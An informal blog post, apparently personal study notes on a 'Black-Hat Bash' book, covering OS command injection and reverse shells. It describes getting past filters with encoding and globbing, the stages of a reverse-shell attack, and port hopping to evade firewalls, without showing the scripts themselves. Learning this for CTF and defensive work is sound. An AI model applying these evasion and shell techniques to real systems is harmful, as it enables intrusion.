Black-Hat Bash scripting part 10

Hi, took a short break, as i did not feel like writing honestly. Well back to it and so begins the tale of the continuation of chapter 6 -os command injection.

what is command injection- it’s a vuln that allows users to be able to execute unauthorised operating system commands by using them as input to an application which can allow an attacker to gain an initial foothold into system/s.

added something light to the script

bypassing command injection restrictions

obfuscation and encoding

using base64, url encoding can allow you to hide from detection of security controls, checks, filters.

Globbing

using wildcard patterns to partially or fully match filenames. a string is considered a wildcard if it has characters such as ?, *,[,], or !.

Ch7 Reverse Shells

this is a different type of pain wouldn’t wish it on anyone

if you have done ctf challenges like hackthebox, pwnbox, tryhackme… a reverse shell is gold, you have gotten access to information you shouldn’t have and in that environment it is easier to find and get a flag, but in the real world, a reverse shell does not give you a flag but info connecting from one system to another evading firewalls, but in in this case the target is the one reaching out to connect.

shell payloads and listeners- you need two things to use operate a reverse-shell, as the title claims. a listener is what runs on an attacker’s machine that waits for a connection to be established from the payload that an attacker sends to the target.

so, how do you start the process of a reverse-shell?

1. the set up: the attacker would use a shell listener that runs on a specific port that can be accessible from the internet e.g it’s literally in my past posts, just check the htb posts, the privilege escalation sections.
2. the exploit: all targets have weaknesses that we consider vulns, an attacker will be aiming for that
3. the upload: the reverse-shell payload is delievered and trying to exploit the vuln that was noticed in the target.
4. the execution: payload gets executed
5. the request: the payload here is trying to connect to the attacker’s machine.
6. the acception: the listener receives the connection and the connection is granted with the target
7. the commands: here the attacker is free to type in the commands they want over the target.

this took way longer than a normal foothold and escalation on htb, made me wonder

port hopping

the script below can be used to alternate hop to avoid firewall detection

Maintaining a continuous reverse shell connection

initial access with brute force

That’s all for now, till next time.